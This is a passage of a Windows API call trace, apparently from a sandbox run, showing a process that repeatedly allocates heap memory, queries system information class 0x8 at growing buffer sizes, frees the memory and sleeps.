RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0306.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0306.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0306.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0306.756] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0306.756] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.756] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0306.757] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dc4e0 [0306.757] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dc4e0 | out: hHeap=0x2560000) returned 1 [0306.757] Sleep (dwMilliseconds=0x110) [0306.762] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0306.762] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.763] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0306.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0306.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0306.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0306.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0306.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0306.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0306.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0306.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0306.770] Sleep (dwMilliseconds=0x110) [0306.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0306.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0306.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0306.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0306.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0306.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0306.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0306.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0306.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0306.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0306.785] Sleep (dwMilliseconds=0x110) [0306.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0306.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0306.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0306.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0306.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0306.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0306.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0306.803] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0306.803] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27de4f0 [0306.804] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27de4f0 | out: hHeap=0x2560000) returned 1 [0306.804] Sleep (dwMilliseconds=0x110) [0306.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0306.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0306.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0306.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0306.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0306.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0306.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0306.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0306.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0306.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0306.813] Sleep (dwMilliseconds=0x110) [0306.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0306.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0306.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0306.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0306.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0306.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.851] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0306.852] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0306.852] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.852] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0306.852] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e0500 [0306.853] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e0500 | out: hHeap=0x2560000) returned 1 [0306.853] Sleep (dwMilliseconds=0x110) [0306.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0306.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0306.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0306.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0306.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0306.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0306.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0306.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0306.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27de4f0 [0306.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27de4f0 | out: hHeap=0x2560000) returned 1 [0306.876] Sleep (dwMilliseconds=0x110) [0306.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0306.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.888] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0306.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0306.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0306.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0306.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0306.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0306.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0306.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27db4d8 [0306.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27db4d8 | out: hHeap=0x2560000) returned 1 [0306.894] Sleep (dwMilliseconds=0x110) [0306.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0306.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0306.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0306.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0306.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0306.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0306.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0306.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0306.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0306.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0306.911] Sleep (dwMilliseconds=0x110) [0306.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0306.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0306.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0306.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0306.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0306.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0306.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0306.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0306.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dc4e0 [0306.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dc4e0 | out: hHeap=0x2560000) returned 1 [0306.927] Sleep (dwMilliseconds=0x110) [0306.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0306.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0306.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0306.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0306.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0306.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0306.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0306.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0306.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0306.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0306.941] Sleep (dwMilliseconds=0x110) [0306.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0306.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0306.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0306.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0306.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0306.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0306.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0306.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0306.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27de4f0 [0306.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27de4f0 | out: hHeap=0x2560000) returned 1 [0306.958] Sleep (dwMilliseconds=0x110) [0306.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0306.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0306.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0306.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0306.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0306.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0306.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0306.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0306.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dd4e8 [0306.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dd4e8 | out: hHeap=0x2560000) returned 1 [0306.973] Sleep (dwMilliseconds=0x110) [0306.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0306.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0306.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0306.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0306.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0306.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0306.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0306.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0306.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0306.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0306.987] Sleep (dwMilliseconds=0x110) [0307.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0307.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: 